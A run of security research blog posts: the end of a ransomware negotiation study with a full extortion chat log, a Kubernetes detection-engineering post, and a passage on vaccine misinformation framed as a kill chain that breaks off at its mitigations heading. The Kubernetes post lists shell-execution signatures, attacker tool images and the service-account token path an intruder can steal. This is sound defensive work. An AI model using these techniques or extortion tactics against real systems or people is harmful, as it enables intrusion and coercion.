  4. Always prepare for a situation in which your files will still be leaked or sold. Despite what the adversaries may show you, you have absolutely no guarantee that your files got deleted. Especially with RAAS platforms your system access and files will have gone through many different parties before they reached the final adversary you were negotiating with. Even if they properly deleted your files, who’s to say any of the other people in the chain did not quickly make a copy of some interesting files for ‘personal usage’.
  5. Ask for an explanation of how the adversary hacked you. In one case a company received an extensive report from the adversary on how they got access and what the company should do to close any vulnerabilities.

Chat conversation between a victim and D-Second adversary

In this example we see the use of multiple negotiation strategies. The victim asks for more time, and successfully talks down the ransom demand from 13 million to 500K.

“Hello. Can we please get some sample files you took from us? Thank you”
     
     “Hello. we took all files by our filters , round- about 2 TB. What proofs you want see? We will send proofs in 12 hours round about. 100 screenshots from infrastructure and evidence pack of data.”

“Thank you. Would it be possible to also receive a list of files? Thank you”

     “Full file tree will be only able in 1-2 working days, quantity of data is so high. Proof pack of files we already started to prepare. Very soon will be sent. Here you are proof pack of your data, we are interested in to continue dialog with CEO, CFO. We are not interested in to talk with system administrators. Don’t worry we done full dump, files from your network by our smart filters.”

“Hello. Thank you for the sample files. When can we get a file tree?”

     “Full file tree will be able after successful deal. In other case files will go to public & mass media. Proof package where provided already with some samples of documents and screenshot as well. Article able public for all, in 2 days we will start publicate data.”

“We thought we have almost 6 days left. Our leadership is currently reviewing the situation and determining the best resolution.”

     “Until we waiting for your reply on situation. We stopped DDoS attack to your domain, you can switch on your website. As well your blog, where hidden. Nobody will see information about that, until we will not get in deal. We stopped already other instruments which already where processed today.”

“Okay, thank you. We want to cooperate with you. We just need some time during this difficult situation.”

“Hello. We would like to know how you came up with this price for us. It is very high.”

     “Hello. We work on mathematical algorithms for each client price is different depending on their financial situation, sphere of activity and other aspects. In your situation price comes like is it. What price is not so high for you, then we have question.”

“Our industry has been suffering in revenue over the last couple of years and we don't make enough to pay even close to that much. Can you suggest a much lower amount that would satisfy you?”

     “We have been asked before, we doesn’t get answer - on our question - What price is not so high for you ???”

“Can you please tell us what we will receive once payment is made?”

     “You will get: 1) full decrypt of your systems and files 2) full file tree 3) we will delete files witch we taken from you 4) audit of your network
"

“This situation is very difficult for us and we are worried we may get attacked again or pay and you will still post our data. What assurances or proof of file deletion can you give us?”

     “We have reputation and word, we worry about our reputation as well. After successful deal you will get: 1) full file trees of your files 2) after you will confirm we will delete all information and send you as proof video, we are not interested in to give to someone other your own data. We never work like that.”

“Okay, thank you. We are going to have some meetings this weekend with our leadership. We need to assess our available funding and we can get back to you after that with what we can pay. Thank you for your patience.”

     “We wait”

“These leadership meetings are going to take this weekend to complete. It may take until Monday to come up with what we might be able to pay.”

     “OK”

“Hello. We would like to know if you would accept our offer of $300k? Our revenue has been severely impacted as the industry has suffered over the last few years, and we can not pay even close to the amount you have asked. We only hope you can understand our situation. Thank you.”

     “Hello. Thank you for offer, sorry but we can't gave you so big discount. We know that all businesses are impacted by Covid-19, and financial crisis , etc. for Us the situation same. We have different questions to you 1) Your reputation costs 300 000 USD? And customer trust. 2) Costs for lawsuits with GDPR as well will cost nothing? 3) How about investors they already know about the situation? We always go forward to our clients. The legal losses will be much greater on today. In case of successful deal think about better offer, and come back. Time is settled and we will continue our procedures if you don’t take situation serious.”

“We of course understand the severity of the situation and have considered all of these issues, however we are offering what we have available. We are a very small company and do not have much revenue and we are offering what we can. We can try to come up with a little more, but it is not so much. We hope you can work with us as we try to satisfy the needs for both of us. Thank you.”

     “What’s the offer?”

“We will get back to you shortly with a revised offer. Thank you”

“Hello. We would like to know if you would accept $350k? This is a significant amount of money for us at this time. Thank you.”

     “We will never accept such ridiculous amount, make it x10 higher and we will think.”

“Thank you for your patience. Unfortunately the amount you are asking for is not something we are able to provide. We are a small company and do not have the revenue, and our insurance is not enough to help with this. We are able to increase our offer to $425k. Please let us know if you are willing to work with us in this. Thank you.”

     “I said you, you must make your offer x10 higher. If you continue to make your ridiculous steps, we will ignore you.”

     “And don't forget, you have the last 21 hours before price will be doubled and all discounts will be impossible, and sure, post with you sensitive data will be published.”

“Hello. We thank you again for your patience. We are asking for you to take into account the difficult position we are in. We do not have the cash funds available or insurance to pay the amount you are seeking. We are not even able to borrow the money right now. We are only able to offer you a little more money right now and this is the most we can do. We can only pay up to $500k. This is our final offer and are prepared for what will happen if you do not accept. If you accept we will arrange for the payment. Thank you for your consideration.”

     “O.K. Your price is changed to 500 000 USD (in XMR Monero). We are ready for compromise.”

“Okay, thank you very much. Please add some time back to the timer so we can arrange for the funds to be sent. We will start the process right away.”

     “We wait”

“Can you show us proof of ability to decrypt our files?”

     “Of course. Send one file we will decrypt and send it back”

“Hello. We are getting close to finalizing making the payment. We will notify you when it is coming, but we would like to conduct a test transaction first. Please confirm you will provide the following when payment is made: 1) Decryption tool 2) File tree 3) Can you provide a link so we can download all of our files in case there is a problem decrypting them? 4) Proof of file deletion after we download all of the files.”

     “1) decrypt tool you I will get instantly 2) file tree will start make after payment 3) all your files if will be needed we will share by link 4) and video of course. Write after sending money.”

“Great, thank you. Will 2250 xmr be okay? That was the amount we purchased because of the amount shown this morning. Now it shows more. We bought 2250.”

     “OK”

“We are preparing to send a test transaction. Once we confirmed it works we will send the remaining amount. To confirm above mentioned, we will definitely want a link to download the files. Thank you.”

     “Link for downloaded files will take time round - about 1 working day. It`s not so easy how you think. We should prepare it for, you in case if you don`t need full file tree.”

“Okay, thank you”

     “Also, we see your payment. You have to send the rest.”

“Okay we will send the rest now”

     “We can see your payment, after 10 confirmations we will do all that was promised.”

“Thank you”

Conclusion

This empirical research suggests that the ecosystem of ransomware has been developed into a sophisticated business. Each ransomware gang has created their own negotiation and pricing strategies meant to maximize their profit. There is a number of well-executed studies focusing on fighting against the (cyber-)criminal and how the adversaries penetrate given targets. However, despite the economics behind this ecosystem being its essential driver, it has oftentimes been overlooked. We concluded that there are clear signs that adversaries have adopted price discrimination techniques based on the yearly revenue of their victims. If we look at the price setting and negotiation from the adversaries’ point of view, we see that they wield a massive advantage over their victims. Not only do they have the luxury of investigating their victims’ financial statements if they choose to do so, but they also have the advantage of having previous experiences they can use. This conclusion can explain the current rise in ransomware infections around the world. Luckily, there are some strategies victims can use to diminish some of the advantages the adversary has which we have covered extensively in the previous chapters.

Looking forward to the future of ransomware, it is no longer the question of whether a company is going to get breached, but rather a question of when. We have even heard people go as far as to say that it is almost an insult if your company does not get attacked nowadays, becoming a business badge of honour of sorts. Similarly, we also see that as more and more companies are becoming a ransomware victim, people are simply becoming tired of hearing it. If the increase in ransom demands stays, and the decrease in public backlash continues, we could see a shift to companies paying less often which would overall be better for society. On the other hand, this could also lead to criminals becoming more aggressive in their persuasion tactics, or lowering their ransom amounts to an equilibrium.

A bit of hope comes from some recent successes from law enforcement agencies. In november 2021 Romanian authorities arrested multiple individuals suspected of deploying the REvil ransomware on victims’ systems as part of operation GoldDust. This operation included authorities from 17 countries which joined efforts with Europol, Eurojust and Interpol. Similarly, in october 2021, another police cooperation between eight countries led to the arrest of twelve suspects that allegedly were part of a worldwide ransomware network. During this investigation multiple companies could be warned that ransomware was about to be deployed on their systems preventing millions of dollars of damages. These cases are perfect examples of a way in which we can find a way to tackle this wicked problem These ransomware groups make victims in multiple countries and do not care about borders. So the only way to fight this is with coordinated international cooperation between police agencies around the world.

We hope that by sharing this research to the public we can add some fuel for the defending side. We demonstrated how powerful the adversaries are during the negotiation, and, most importantly, have created a safety net for the unlucky victims who have fallen.Let us look back at the hypothetical case we opened with. “We wait”, that was their reply after you told them you needed more time. After the entire investigation is over and all the systems have been restored, it became clear to you that they were not in a hurry. They had been in the company’s systems for three weeks prior to rolling out the ransomware. They had access to all your internal documents, including all finance related statements. They knew everything about you, and you knew very little about them. They waited because they knew you would pay in the end. But how much did you end up paying? The full 3.5 million, or less? Or did you not end up paying at all. The end of this story will not be told by us, but by the countless cases that will continue to happen in the future. We just hope that the information we provided will help in making the right decisions for your situation.

Acknowledgement

We would like to express our special thanks to Nikki van der Steuijt, and all the members of Fox-IT threat intelligence team.

References

[1] Adam Young and Moti Yung, Cryptovirology: Extortion-Based Security Threats and Countermeasures, IEEE Security and Privacy, May 1996

[2] Michael Sandee, CryptoLocker ransomware intelligence report, https://blog.fox-it.com/2014/08/06/cryptolocker-ransomware-intelligence-report/, August 6, 2014

[3] Maarten van Dantzig, FAQ on the WanaCry ransomware outbreak, https://www.fox-it.com/en/news/blog/faq-on-the-wanacry-ransomware-outbreak/

[4]SOPHOS, SamSam: The (Almost) Six Million Dollar Ransomware, https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

[5] Hernandez-Castro, Julio and Cartwright, Edward and Stepanova, Anna, Economic Analysis of Ransomware (March 20, 2017). Available at SSRN: http://dx.doi.org/10.2139/ssrn.2937641

[6] A. C. Pigou, The Economics of Welfare, Macmillan and Co., Limited St. Martin’s Street, London, 1920

✇ NCC Group Research

Detection Engineering for Kubernetes clusters

By: Ben Lister

Written by Ben Lister and Kane Ryans

This blog post details the collaboration between NCC Group’s Detection Engineering team and our Containerisation team in tackling detection engineering for Kubernetes. Additionally, it describes the Detection Engineering team’s more generic methodology around detection engineering for new/emerging technologies and how it was used when developing detections for Kubernetes-based attacks.

Part 1 of this post will offer a background on the basics of Kubernetes for those from Detection Engineering who would like to learn more about K8s, including what logging in Kubernetes looks like and options available for detection engineers in using these logs.

Part 2 of this post offers a background on the basics of Detection Engineering for those from the containerization space who don’t have a background in detection engineering.

Part 3 of this post brings it all together, and is where we’ve made unique contributions. Specifically, it discusses the novel detection rules we have created around how privilege escalation is achieved within a Kubernetes cluster, to better enable security operations teams to monitor security-related events on Kubernetes clusters and thus to help defend them in real-world use.

For those with familiarity with Kubernetes, you may wish to skip forward to our intro to Detection Engineering section here, or to our work on detection engineering for Kubernetes, here

Part 1: Background – Introduction to Kubernetes

Before talking about detections for Kubernetes, we’ll in this section offer a brief overview of What Kubernetes is, its’ main components, and how they work together.

What is Kubernetes? 

Kubernetes (commonly stylized as K8s) is an open-source container-orchestration system for automating computer application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. It aims to provide a "platform for automating deployment, scaling, and operations of Container workloads". It works with a range of container tools and runs containers in a cluster, often with images built using Docker. [1]

Figure 1: A typical cluster diagram. More information on the components can be found here

At a high level, the cluster can be divided into two segments, the control plane and the worker nodes. The control plane is built up of the components that manage the cluster such as the API server, and it is this control plane where we focused our detection efforts which will be discussed later on.

Whilst we’re discussing the various components of a cluster, it is important to quickly note how authentication and authorization is handled. Kubernetes uses roles to determine if a user or pod is authorized to make a specific connection/call. Roles are scoped to either the entire cluster (ClusterRole) or a particular namespace (Role).

These roles contain lists of resources (the object) the role can grant access to, and a list of verbs that the role can perform on the said resource, are declared and then attached to RoleBindings. RoleBindings pretty much link the role (permissions) with the users and systems. More information on this functionality can be found here in the Kubernetes official documentation.

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "watch", "list"]

Figure 2: Example of a policy configuration taken from the Kubernetes documentation

The above policy is allowing any system or user to retrieve information on pod resources located in the default namespace of the cluster.

Why use Kubernetes?

Kubernetes provides the capability to scale up horizontally as opposed to scaling vertically, i.e., spreading the workload by adding more nodes instead of adding more resources to existing nodes.

Kubernetes is an enticing proposition for many companies because it provides them with the ability to document configurations, disperse applications across multiple servers, and configure auto-scaling based on current demand.

Kubernetes Logging

Detection engineers are only as good as their data. That is why finding reliable and consistent logs is the first problem that needs solving when approaching a new technology for detection engineering.

This problem is made harder as there are multiple ways of hosting Kubernetes environments, such as managed platforms like Azure Kubernetes Service (AKS), Elastic Kubernetes Services (EKS) and Google Kubernetes Services; and natively running Kubernetes as an unmanaged solution.

Ultimately, we decided to utilise API server audit logs. These logs provide a good insight into what is going on inside the cluster, due to the nature of the API server. In normal operation, every request to make a change on the Kubernetes cluster goes through the API server. It is also the only log source consistent among all platforms.

However, there are some issues raised by using these logs. Firstly they need to be enabled, the audit policy detailed here is a good start and is what was used in our testing environments. Some managed platforms will not let you customise the audit logging, but it still needs to be enabled. From a security perspective certain misconfiguration, such as unauthenticated access to Kubelets, would allow an attacker to bypass the API server, making these logs redundant and therefore bypassing all our detections.

It is important to note that audit logs will tell you everything that is happening from an orchestration perspective (pods being deployed, configuration changes, users being added, etc), not what is happening inside the containers which in some cases tends to be where the initial compromise occurs.

An audit policy that is too broad can easily generate a lot of irrelevant events, so testing of the configuration should be conducted to ensure ingestion of these events are within acceptable limits.

{
  "kind": "Event",
  "apiVersion": "audit.k8s.io/v1",
  "level": "Request",
  "auditID": "bd93fded-1f5a-4046-a37c-82d8909b2a80",
  "stage": "ResponseComplete",
  "requestURI": "/api/v1/namespaces/default/pods/nginx-deployment-75ffc6d4d-nt8j4/exec?command=%2Fbin%2Fbash&container=nginx&stdin=true&stdout=true&tty=true",
  "verb": "create",
  "user": {
    "username": "kubernetes-admin",
    "groups": [
      "system:masters",
      "system:authenticated"
    ]
  },
  "sourceIPs": [
    "<removed>"
  ],
  "userAgent": "kubectl/v1.21.2 (darwin/amd64) kubernetes/092fbfb",
  "objectRef": {
    "resource": "pods",
    "namespace": "default",
    "name": "nginx-deployment-75ffc6d4d-nt8j4",
    "apiVersion": "v1",
    "subresource": "exec"
  },
  "responseStatus": {
    "metadata": {},
    "code": 101
  },
  "requestReceivedTimestamp": "2021-10-21T08:39:05.495048Z",
  "stageTimestamp": "2021-10-21T08:39:08.570472Z",
  "annotations": {
    "authorization.k8s.io/decision": "allow",
    "authorization.k8s.io/reason": ""
  }
}

Figure 3: A sample of an audit log

Part 2: Background – Detection Engineering Approach

This next section is to give some background around our approach to detection engineering and is not specific to Kubernetes. If you are just here for the Kubernetes content, feel free to skip it and the rest of the blog will still be understandable.

When approaching a problem, it can be helpful breaking it down to simpler steps. We do this in detection engineering by splitting our detections into categories. These categories allow us to look at the problem through the lens of each category and this helps create a well-balanced strategy that incorporate the different types of detection. There are three distinct categories, and each has its own strengths and weakness, but all contribute to an overall detection strategy. The categories are signatures, behaviours, and anomalies.

Signatures

Signatures are the simplest category. It includes detection that are predominately string matching and using known Indicator of Compromise (IoC). They are simple to create and so can be produced quickly and easily. They are usually very targeted to a single technique or procedure so produce low numbers of false positives and are easy to understand by a SOC analyst. However, they are usually trivial to bypass and should not be relied upon as the sole type of detection. Nonetheless, signatures are the first level of detection and allows for a broad coverage over many techniques.

Behaviours

Behavioural analytics are more robust than signatures. They are based on breaking down a technique to its core foundations and building detections around that. They are usually based on more immutable data sources, ones that can’t be changed without changing the behaviour of the technique itself. While the quality of the detection itself is usually higher, the quality of the alert is comparatively worse than signature-based analytics. They will likely produce more false positives and be harder to understand exactly why any alert is being produced due to the more abstract nature of the analytics and the need for more in-depth understanding of the technique being detected.

Anomalies

Anomaly analytics are any detections where "normal" behaviour is defined and anything outside of normal is alerted on. These kinds of analytics are not necessarily detecting anything malicious, but anything significantly different so that it will be worth further investigation. A single anomaly-based detection can be effective against a wide range of different techniques. However, they can be harder to evaluate performance on compared to signatures and behavioural detections as performance may significantly differ depending on the environment. This can be mitigated somewhat my using techniques that calculate the thresholds based on historical data which means the thresholds are tailored to that environment.

Understanding your advantage

The other concept that is useful when approaching detection engineering is "knowing where we can win". This is the idea that for any given environment/system/technology there will be areas where defenders have a natural advantage. This may be because the logging is better, the attacker is forced into doing something, or there is a limited number of options for an attacker. For example, in a Windows Environment the defender has an advantage when detecting lateral movement. This is because there is twice as much logging (logs can be available on both the source and destination host), there is a smaller number of techniques available compared to other tactics such as execution and an attacker will usually have to move laterally at some point to achieve their goals.

Part 3: Kubernetes Detections

Through our collaboration with NCC Group’s Containerisation team, we identified several use cases that needed detection. The main area on which we decided to focus our efforts was around how privilege escalation is achieved within the cluster. The two main ways this is done is abusing privileges of an existing account or creating a pod to attempt privilege escalation. All our detections are based on events generated by audit logs. For brevity, only a subset of our detections will be described in this blog.

Signatures

The audit logs are a useful source for signature-based detection, since they provide valuable information, such as request URIs, user-agents and image names where applicable. These fields in the data can be matched against lists of known suspicious and malicious strings. These lists can then be easily updated, for example, adding new signatures and removing older signatures based on their effectiveness.

Interactive Command Execution in RequestURI

For certain requests the requestURI field within an audit log contains the command being executed, and the namespace and pod the command is being applied to. This can be used to identify when a command shell is being used and may indicate further suspicious behaviour if unauthorized.

The table contains some of the shell examples of signatures that can be used to detect this type of behaviour in the requestURI field. A full example of how this might look in an audit log can be seen in figure 3 earlier in the blog. Some example of signature that are useful t search for are:

  •  %2Fbin%2Fbash
  • %2Fbin%2Fsh 
  • %2Fbin%2Fash

User-Agent

The user-agent is a HTTP header that provides meta information on the kind of operating system and application that is performing the request. In some cases, it can also be used to identify certain tooling making requests.

One example of using this field for signature-based detection is looking for User-Agents containing "access_matrix". Any occurrences of this would signify an access review tool is being used called Rakkess. This tool is a kubectl plugin and would be expected within say something like a dev or staging cluster. When the use is unexpected this may be indicative of an attacker performing post compromise actions.

  "userAgent": "kubectl-access_matrix/v0.0.0 (darwin/amd64) kubernetes/$Format"

Another example might be the use of cURL or HTTP request libraries that may indicate post-exploit actions, especially when not been previously seen in the environment. Important to note that the user-agent can be modified by the source, so it is trivial to bypass this type of detection.

Image

This field includes the image name to be deployed and the registry from which it came. These tools all have legitimate use cases but any unauthorized use of them on a Kubernetes cluster would need alerting on and further investigation.

Some examples of such images include but aren’t limited to.

  • cyberark/kubiscan 
  • aquasec/kubehunter
  • cloudsecguy/kubestriker
  • corneliusweig/rakkess 

The image field could also be utilised to detect when pods are being deployed for crypto-mining purposes. Running crypto miners after compromising a cluster is a commonly seen tactic and any known crypto mining images should also be added as a signature for known bad container images.

Behaviours

Anonymous User Logon

With any system a user performing actions without authenticating is usually a bad thing. Kubernetes is no different and there have been some high-profile incidents where the initial access was an API Server exposed to the internet which allowed unauthenticated access. The first line of defence would be to mitigate the attack by disabling unauthenticated access. This can be done with the –anonymous-auth=false flag when starting a kubelet or API server.

As an additional layer of defence, any request to the API server where the user field is system:anonymous or system:unauthenticated should also be alerted on.

Service Account Compromise

Kubernetes pods run under the context of a service account. Service accounts are a type of user account created by Kubernetes and used by the Kubernetes systems. They differ from standard user account in that they are prefixed with “serviceaccount” and usually follow well-defined behaviours. To authenticate as a service account, every pod stores a bearer token in /var/run/secrets/kubernetes.io/serviceaccount/token, which allows the pod to make requests to the API server. However, if the pod is compromised by an adversary, they will have access to this token and will be able to authenticate as the service account, potentially leading to an escalation of privileges.

Detecting this type of compromise can be difficult as we won’t necessarily be able to differentiate between normal service account usage and the attacker using the account. However, the advantage we have is that service accounts have well-defined behaviour. A service account should never send a request to the API server that it isn’t authorised to do. Additionally, a service account should never have to check the permissions it has. Both actions are more indicative of a human using the service account rather than the system. Therefore, any requests where the user starts with “serviceaccount” that is denied or the resource field contains “selfsubjectaccessreview” should be alerted on.

Other Notable Behaviours

The major behaviour we have not gone into detail in this post is how Kubernetes handles Role-Based Access Control (RBAC). RBAC is a complex topic in Kubernetes and warrants its own blog post to go into all the different ways it can be abused. However, in any system it is worth alerting on high privilege permissions being assigned to users and this should be handled in any Kubernetes detections as well.

A ‘short lived disposable container’ is another behaviour that can indicate malicious behaviour. Shell access to containers configured with tty set to true, and a restart policy set to never are highly suspicious on an operational cluster. It’s unlikely there is a genuine need for this, and it could indicate an attacker trying to cover up their tracks.

Finally, the source IP is present in all audit log events. Any request outside of expected IP ranges should be alerted on, particularly for public IP ranges as this may indicate that the API server has been accidentally exposed to the internet.

Anomalies

One of the questions we asked ourselves was “How do we know when a pod has been created for malicious purposes?”. There are multiples ways a pod could be configured that would allow some form of privilege escalation. However, each of these configurations have a legitimate use case and it is only when they are used in a way that deviates from normal behaviour that they become suspicious.

In order to create detections for this the following assumption was made; pods created by a single company will following similar patterns in their configuration and deviations from these patterns would include pods that are suspicious and would be worthwhile putting in front of an analyst to investigate further.

Anomaly detection by Clustering

To do this we used a technique called clustering. This blog will not go into many details of exactly how the clustering works, some SIEMs such as Splunk have built in functions to allow this kind of processing to be done with minimal effort. Clustering involves taking multiple features of an object, in this case the configurations of the pod, and grouping the objects so that the objects with similar features are in the same group. The easiest way of describing clustering and how we can find anomalies is through visualising it.

The diagram shows a set of objects that are split into clusters based on their 2 features. It’s trivial to see 2 large groups of points, cluster 1 and cluster 2, that have been grouped based on feature similarity. The assumption would be that any object in these clusters are normal. The anomaly is the red triangle, since its features do not follow the pattern of the other objects and therefore would be worth further investigation.

Feature Extraction

The important part is choosing the right features to cluster on. We want to identify features of pod creation that remain consistent during normal activity (e.g., the user creating the pod and the registry of the container image) since changes in these would indicate suspicious behaviour. Also, we want to identify settings that could allow some form of privilege escalation, changes in these settings could indicate a malicious pod being created. For this we consulted our internal containerisation team and the list of the features decided upon can be found in the table below. Also included is the json path to find these field in the audit log.

Feature Description JSON path in audit log
Image Registry Registry the container image is stored. Effective when using a custom container registry requestObject.spec.container.image
User User sending the request. Effective when a subset of users create pods user.username
Privilege Container When enabled, privileged containers have access to all devices on the host requestObject.spec.container.securityContext.privileged
Mounted Volumes Indicates which directories on the host the container has access to. Mounting /host gives access to all files on host requestObject.spec.container.volumeMounts.mountPaths
HostNetwork When enabled container has access to any service running on localhost on the host requestObject.spec.container.HostNetwork
HostIPC When enabled container share IPC namespace. Allows inter-process communication with process on host requestObject.spec.container.HostIPC
HostPID When enabled containers share the PID namespace on the host. Allows for process listing of the host requestObject.spec.container.HostPID

Bringing it all together

Splunk contains a cluster command which is perfect for this use case. By creating a single string of the features delimited by a character of our choice, we can assign all pod creation events to a cluster. The exact time period to run the command over is subject to a trade-off between performance of the detection and performance of the query. The longer the lookback, the less chance of false positives, but the longer the time the query takes to run. After some trial and error, we found 14 days was a good middle ground but could be increased up to 30 days for smaller environments.

Once the cluster command has run, we can look for any events assigned to a cluster where the overall size of the cluster is relatively small. These will be events that are sufficiently different from the rest that we will want to flag them as suspicious and have an analyst investigate further.

Conclusions

So to wrap things up, the use of Kubernetes is increasing so therefore detection engineering of this technology becomes an important problem to tackle. Kubernetes Audit logs allow us to tackle this as they are a great source of events within the Kubernetes cluster and importantly are consistent across all platforms that run a Kubernetes cluster. A good detection engineering strategy has multiple layers and includes a variety of detections based on signatures, behaviours, and anomalies. In particular for Kubernetes, we want to be focusing our efforts on abuse of privileges and the creation of pods. There are multiple approaches to doing this, a few of which we have introduced in this post.

✇ NCC Group Research

Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain

By: Swathi Nagarajan

The open and wide-reaching nature of social media platforms have led them to become breeding grounds for misinformation, the most recent casualty being COVID-19 vaccine information. Misinformation campaigns launched by various sources for different reasons but working towards a common objective – creating vaccine hesitancy – have been successful in triggering and amplifying the cynical nature of people and creating a sense of doubt about the safety and effectiveness of vaccines. This blog post discusses one of our first attempts within NCC Group to examine misinformation from the perspective of a security researcher, as a part of our broader goal of using techniques inspired by digital forensics, threat intelligence, and other fields to study misinformation and how it can be combatted. 

Developing misinformation countermeasures requires a multidisciplinary approach. The MisinfoSec Working Group is a part of the Credibility Coalition – an interdisciplinary research committee which aims to develop common standards for information credibility – which is developing a framework to understand and describe misinformation attacks using existing cybersecurity principles [1]

In this blogpost, which is part 1 of a series, we take a page out of their book and use the Cyber Kill Chain attack framework to describe the COVID-19 vaccine misinformation attacks occurring on social media platforms like Twitter and Facebook. In the next blogpost, we will use data from studies which analyze the effects of misinformation on vaccination rates to perform a formal risk analysis of vaccine misinformation on social media.

An Overview of the Cyber Kill Chain

The Cyber Kill Chain is a cybersecurity model which describes the different stages in a cyber-based attack. It was developed based on the “Kill Chain” model [2] used by the military to describe how enemies attack a target. By breaking down the attack into discrete steps, the model helps identify vulnerabilities at each stage and develop defense mechanisms to thwart attackers or force them to make enough noise to detect them.

Vaccine Misinformation Attacks as a Cyber Kill Chain

In this section, we use the Cyber Kill Chain defined by Lockheed Martin [3] to describe how misinformation attacks occur on social media. The goal is to study these attacks from a cybersecurity perspective in order to understand them better and come up with solutions by addressing vulnerabilities in each stage of the attack.

In this scenario, we assume that the “attackers” or “threat actors” are individuals or organizations whose objective is to create a sense of confusion about the COVID-19 vaccines. They could be motivated by a variety of factors like money, political agenda, religious beliefs, and so on. For instance, evidence was recently found to indicate the presence of Russian disinformation campaigns on social media [4][5] which attack the Biden administration’s vaccine mandates and sow distrust in the Pfizer and Moderna vaccines to promote the Russian Sputnik vaccine. Anti-vaccine activists, alternative health entrepreneurs and physicians have also been found to be responsible for a lot of the COVID-19 vaccine hoaxes circulating on social media sites including Facebook, Instagram and Twitter [6].

We also assume that the “asset” at risk is the COVID-19 vaccine information on social media, and the “targets” range from government and health organizations to regular users of social media.

Step 1: Reconnaissance

There are two types of reconnaissance:

  1. Passive reconnaissance: The attacker acquires information without interacting with the target actors. Since social media platforms are public, this kind of recon is easy for attackers to perform. They can monitor the activity of users with public profiles, follow trends, and study and analyze existing measures in place for thwarting misinformation spread. They can also find existing misinformation created both intentionally or as a joke (spoofs or satire) which they could later use out of context.
  2. Active reconnaissance: The attacker interacts with the target to acquire information. In this case, it could mean connecting with users having private profiles by impersonating a legitimate user, using phishing tactics to learn about the targets such as their political affiliation, vaccine opinions and vaccination status (if it is not already publicly available). The attacker could also create an account to snoop around and study other user activity, the social media platform activity and test the various misinformation prevention measures on a small scale.

Step 2: Weaponization

This stage involves the creation of the attack payload i.e., the misinformation. These could be advertisements, posts, images, and links to websites which contain misinformation. The misinformation could be blatantly false information, semantically incorrect information or out of context truths. For example, conspiracy theories like “The COVID-19 vaccines contain microchips that are used to track people” [7] are blatantly false. Blowing up the rare but serious side effects of the vaccine out of proportion is an example of misinformation as truth out of context. Deepfakes can also be used to create convincing misinformation. Spoof videos or misinformation generated accidentally that were already online could also be used by attackers to further their own cause [8].

A lot of social media platforms have been implementing tight restrictions on COVID-19 related posts, so it would be prudent for the attacker to create a payload which can circumvent those restrictions for as long as possible. 

Step 3: Delivery

Once the misinformation sources are ready, it needs to be deployed onto social media to reach the target people. This involves creating fake accounts, impersonating legitimate user accounts, making parody accounts/hate groups, and using deep undercover accounts that were created during the recon stage. The recon stage also reveals users or influencers whose beliefs align with the anti-vaccine misinformation which the attacker is attempting to spread. The attackers could convince these users – either through monetary means or by appealing to their shared objective – to spread the misinformation i.e., deliver the payload.

Step 4: Exploitation

The exploitation stage in this scenario refers to the misinformation payloads successfully bypassing misinformation screeners used by the social media platforms (if they exist) and reaching the target demographic i.e., anti-vaxxers, people who are on the fence about the vaccine etc. 

Despite several misinformation prevention measures being used by various social media platforms (refer Table 1), there still seems to be a significant presence and spread of misinformation online. Spreading misinformation on a large scale overwhelms the social media platforms [13] and adds complexity to their misinformation screening process since it requires manual intervention a lot of the time and the manpower available is very less compared to the large volume of misinformation. A study found that some social media sites allowed advertisements with coronavirus misinformation to be published [14], suggesting that some countermeasures may not always be effectively implemented.

Social Media Platform Measures to combat misinformation
Facebook (and its apps) [9] – Remove COVID-19 related misinformation that could contribute to imminent physical harm based on guidance from the WHO and other health authorities.
– Fact-checking to debunk false claims.
– Strong warning labels and notifications for posts containing misinformation which don’t directly result in physical harm.
– Labelling forwarded/chain messages and limiting the number of times a message can be forwarded.
– Remove accounts engaging in repeated malicious activities.
Twitter [10] – Remove tweets containing most harmful COVID-19 related misinformation.
– Apply labels to Tweets that may contain misleading information about COVID-19 vaccines.
– Strike-based system for locking or permanent suspension of accounts violating the rules and policies.
Reddit [11] – User-aided content moderation.
– Banning or quarantining reddit communities which promote COVID-19 denialism.
– Build a new reporting feature for moderators to allow them to better provide a signal when they see community interference.
TikTok [12] – Fact-checking.
– Remove content, ban accounts, and make it more difficult to find harmful content, like misinformation and conspiracy theories, in recommendations or search.
– Threat assessments
Table 1: Popular social media platforms and their measures to combat misinformation

The other vulnerability which attackers try to exploit has more to do with human nature and psychology. A study by YouGov [15] showed that 20% of Americans believe that it is “definitely true” or “probably true” that there is a microchip in the COVID-19 vaccines. This success rate of the conspiracy theory was attributed to the coping mechanism of humans to make sense of things which cannot be explained, or when there is a sense of uncertainty [16]. “Anti-vaxxers” have been around for a long time, and with the COVID-19 vaccines there is an even deeper sense of mistrust because of the shorter duration in which it was developed and tested. The overall handling of the COVID-19 pandemic by some government organizations has also been disappointing for the public. Attackers use this sense of chaos and confusion to their advantage to stir the pot further with their misinformation payloads.

Step 5: Installation

The installation stage of the cyber kill chain usually refers to the malware installation by attackers on the target system after delivering the payload. With respect to vaccine misinformation attacks, this stage refers to rallying groups of people and communities towards the attacker’s cause, either online and/or in physical locations. These users act as further carriers of the misinformation across various social media platforms, reinforcing it through reshares, reposts, retweets etc., leading to the misinformation gaining attention and popularity. 

Step 6: Command and Control

Once the attacker gains control over users who have seen the misinformation and interacted with it, they can incite further conflict in the conversations surrounding the misinformation, such as through comments of a post. They can also manipulate users into arranging or attending anti-vax rallies or protest vaccine mandates, causing a state of civil unrest. 

Step 7: Actions on Objectives

It is safe to assume that usually the objective of attackers performing vaccine misinformation attacks is to lower the vaccination rates. This objective can also be extended further and tied to other motives. For example, foreign state-sponsored misinformation attacks target US-developed vaccines, such as the Moderna and Pfizer mRNA vaccines, could have been created in order to suggest the superiority of vaccines developed in other nations. 

It is important to realize that the purpose of misinformation campaigns is not always to convince people that things are a certain way – rather, can simply be to seed doubt in a system, or in the quality of information available, making people more confused, overwhelmed, angry, or afraid. The sheer volume of misinformation available online has caused for some people a state of hesitancy and cynicism about the safety and effectiveness of the vaccines, even among people who are not typically “anti-vax”. Attackers generally aim to plant seeds of doubt in as many people’s minds as possible rather than attempting to convince them to not take the vaccine, since confusion is often sufficient to reduce vaccination rates.

Defenses and Mitigations to the Misinformation Kill Chain 

